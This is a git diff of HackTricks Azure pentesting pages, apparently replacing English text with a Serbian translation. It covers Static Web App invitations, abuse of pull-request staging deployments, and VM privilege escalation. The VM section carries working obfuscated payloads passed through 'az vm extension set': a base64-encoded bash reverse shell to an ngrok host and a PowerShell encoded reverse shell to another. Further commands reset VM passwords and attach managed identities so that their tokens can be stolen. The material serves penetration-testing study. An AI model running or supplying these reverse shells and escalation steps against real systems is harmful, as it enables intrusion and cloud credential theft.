be invited with the following command: +Ova dozvola omogućava **kreiranje pozivnice za korisnika** da pristupi zaštićenim putanjama unutar statičke web aplikacije sa određenom dodeljenom ulogom. +Prijava se nalazi na putanji kao što je `/.auth/login/github` za github ili `/.auth/login/aad` za Entra ID, a korisnik može biti pozvan sledećom komandom: ```bash az staticwebapp users invite \ - --authentication-provider Github # AAD, Facebook, GitHub, Google, Twitter \ - --domain mango-beach-071d9340f.4.azurestaticapps.net # Domain of the app \ - --invitation-expiration-in-hours 168 # 7 days is max \ - --name my-first-static-web-app # Name of the app\ - --roles "contributor,administrator" # Comma sepparated list of roles\ - --user-details username # Github username in this case\ - --resource-group Resource_Group_1 # Resource group of the app +--authentication-provider Github # AAD, Facebook, GitHub, Google, Twitter \ +--domain mango-beach-071d9340f.4.azurestaticapps.net # Domain of the app \ +--invitation-expiration-in-hours 168 # 7 days is max \ +--name my-first-static-web-app # Name of the app\ +--roles "contributor,administrator" # Comma sepparated list of roles\ +--user-details username # Github username in this case\ +--resource-group Resource_Group_1 # Resource group of the app ``` - ### Pull Requests -By default Pull Requests from a branch in the same repo will be automatically compiled and build in a staging environment. This could be abused by an attacker with write access over the repo but without being able to bypass branch protections of the production branch (usually `main`) to **deploy a malicious version of the app** in the statagging URL. +Podrazumevano, Pull Requests iz grane u istom repozitorijumu će biti automatski kompajlirani i izgrađeni u staging okruženju. Ovo bi moglo biti zloupotrebljeno od strane napadača sa pristupom za pisanje u repozitorijum, ali bez mogućnosti da zaobiđe zaštitu grane produkcijske grane (obično `main`) da **implementira zloćudnu verziju aplikacije** u staging URL-u. -The staging URL has this format: `https://-..` like: `https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net` +Staging URL ima ovaj format: `https://-..` kao: `https://ambitious-plant-0f764e00f-2.eastus2.4.azurestaticapps.net` > [!TIP] -> Note that by default external PRs won't run workflows unless they have merged at least 1 PR into the repository. An attacker could send a valid PR to the repo and **then send a malicious PR** to the repo to deploy the malicious app in the stagging environment. HOWEVER, there is an unexpected protection, the default Github Action to deploy into the static web app need access to the secret containing the deployment token (like `secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F`) eve if the deployment is done with the IDToken. This means that because an external PR won't have access to this secret and an external PR cannot change the Workflow to place here an arbitrary token without a PR getting accepted, **this attack won't really work**. - +> Imajte na umu da podrazumevano spoljašnji PR-ovi neće pokretati radne tokove osim ako nisu spojili barem 1 PR u repozitorijum. Napadač bi mogao poslati validan PR u repozitorijum i **zatim poslati zloćudni PR** u repozitorijum da implementira zloćudnu aplikaciju u staging okruženju. MEĐUTIM, postoji neočekivana zaštita, podrazumevani Github Action za implementaciju u statičku web aplikaciju treba pristup tajni koja sadrži token za implementaciju (kao što je `secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_AMBITIOUS_PLANT_0F764E00F`) čak i ako se implementacija vrši sa IDToken-om. To znači da pošto spoljašnji PR neće imati pristup ovoj tajni i spoljašnji PR ne može promeniti Workflow da ovde postavi proizvoljni token bez da PR bude prihvaćen, **ova napad neće zaista uspeti**. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md index f569966f8..a26ebb2fd 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -34,7 +34,7 @@ az vm extension set \ --settings '{}' \ --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}' ``` -- Izvršite skriptu smeštenu na internetu +- Izvršite skriptu koja se nalazi na internetu ```bash az vm extension set \ --resource-group rsc-group> \ @@ -65,7 +65,7 @@ az vm extension set \ --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}' ``` -- Izvrši reverznu ljusku iz fajla +- Izvrši reverznu ljusku iz datoteke ```bash az vm extension set \ --resource-group \ @@ -105,7 +105,7 @@ Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Na DesiredConfigurationState (DSC) -Ovo je **VM ekstenzija** koja pripada Microsoftu i koristi PowerShell DSC za upravljanje konfiguracijom Azure Windows VM-ova. Stoga se može koristiti za **izvršavanje proizvoljnih komandi** u Windows VM-ovima putem ove ekstenzije: +Ovo je **VM ekstenzija** koja pripada Microsoftu i koristi PowerShell DSC za upravljanje konfiguracijom Azure Windows VMs. Stoga se može koristiti za **izvršavanje proizvoljnih komandi** u Windows VMs putem ove ekstenzije: ```bash # Content of revShell.ps1 Configuration RevShellConfig { @@ -157,7 +157,7 @@ Set-AzVMDscExtension ` Hibridni Runbook Radnik -Ovo je VM ekstenzija koja bi omogućila izvršavanje runbook-ova u VM-ovima iz automatskog naloga. Za više informacija pogledajte [Automatske naloge](../az-services/az-automation-account/index.html). +Ovo je VM ekstenzija koja bi omogućila izvršavanje runbook-ova u VM-ovima iz automatskog naloga. Za više informacija pogledajte [Automation Accounts service](../az-services/az-automation-account/index.html). @@ -308,9 +308,9 @@ Ova dozvola omogućava korisniku da **prijavi kao korisnik u VM putem SSH ili RD Prijavite se putem **SSH** sa **`az ssh vm --name --resource-group `** i putem **RDP** sa vašim **redovnim Azure akreditivima**. -## `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` +### `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Sve ove dozvole su neophodne da bi se **napravio VM sa specifičnom upravljanom identitetom** i ostavio **port otvoren** (22 u ovom slučaju). Ovo omogućava korisniku da kreira VM i poveže se na njega i **ukrade tokene upravljane identitete** kako bi eskalirao privilegije na njega. +Sve ove dozvole su neophodne da se **kreira VM sa specifičnom upravljanom identitetom** i da se ostavi **port otvoren** (22 u ovom slučaju). Ovo omogućava korisniku da kreira VM i poveže se na njega i **ukrade tokene upravljane identitete** kako bi eskalirao privilegije na njega. U zavisnosti od situacije, može biti potrebno više ili manje dozvola za zloupotrebu ove tehnike. ```bash @@ -327,7 +327,7 @@ az vm create \ ``` ### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Ove dozvole su dovoljne da **dodelite nove upravljane identitete VM-u**. Imajte na umu da VM može imati nekoliko upravljanih identiteta. Može imati **sistemsku dodeljenu identitet**, i **mnoge korisnički upravljane identitete**.\ +Ove dozvole su dovoljne da **dodelite nove upravljane identitete VM-u**. Imajte na umu da VM može imati nekoliko upravljanih identiteta. Može imati **sistemsku dodeljenu identitet** i **mnogo korisnički upravljanih identiteta**.\ Zatim, iz servisa za metapodatke moguće je generisati tokene za svaki od njih. ```bash # Get currently assigned managed identities to the VM @@ -343,13 +343,13 @@ az vm identity assign \ /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \ /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2 ``` -Zatim napadač treba da **na neki način kompromituje VM** kako bi ukrao tokene iz dodeljenih upravljanih identiteta. Proverite **više informacija u**: +Napadač mora **neki način kompromitovati VM** da bi ukrao tokene iz dodeljenih upravljanih identiteta. Proverite **više informacija u**: {{#ref}} https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm {{#endref}} -### "Microsoft.Compute/virtualMachines/read","Microsoft.Compute/virtualMachines/write","Microsoft.Compute/virtualMachines/extensions/read","Microsoft.Compute/virtualMachines/extensions/write" +### Microsoft.Compute/virtualMachines/read, Microsoft.Compute/virtualMachines/write, Microsoft.Compute/virtualMachines/extensions/read, Microsoft.Compute/virtualMachines/extensions/write Ove dozvole omogućavaju promenu korisnika i lozinke virtuelne mašine za pristup: ```bash @@ -359,8 +359,24 @@ az vm user update \ --username \ --password ``` +### Microsoft.Compute/virtualMachines/write, "Microsoft.Compute/virtualMachines/read", "Microsoft.Compute/disks/read", "Microsoft.Network/networkInterfaces/read", "Microsoft.Network/networkInterfaces/join/action", "Microsoft.Compute/disks/write". + +Ove dozvole vam omogućavaju da upravljate diskovima i mrežnim interfejsima, i omogućavaju vam da priključite disk na virtuelnu mašinu. +```bash +# Update the disk's network access policy +az disk update \ +--name \ +--resource-group \ +--network-access-policy AllowAll + +# Attach the disk to a virtual machine +az vm disk attach \ +--vm-name \ +--resource-group \ +--name +``` ### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action -Prema [**dokumentaciji**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), ova dozvola vam omogućava da upravljate operativnim sistemom vašeg resursa putem Windows Admin Center-a kao administrator. Tako da izgleda da ovo daje pristup WAC-u za kontrolu VM-ova... +Prema [**dokumentaciji**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), ova dozvola vam omogućava da upravljate operativnim sistemom vašeg resursa putem Windows Admin Centra kao administrator. Tako da izgleda da ovo daje pristup WAC-u za kontrolu VM-ova... {{#include ../../../banners/hacktricks-training.md}}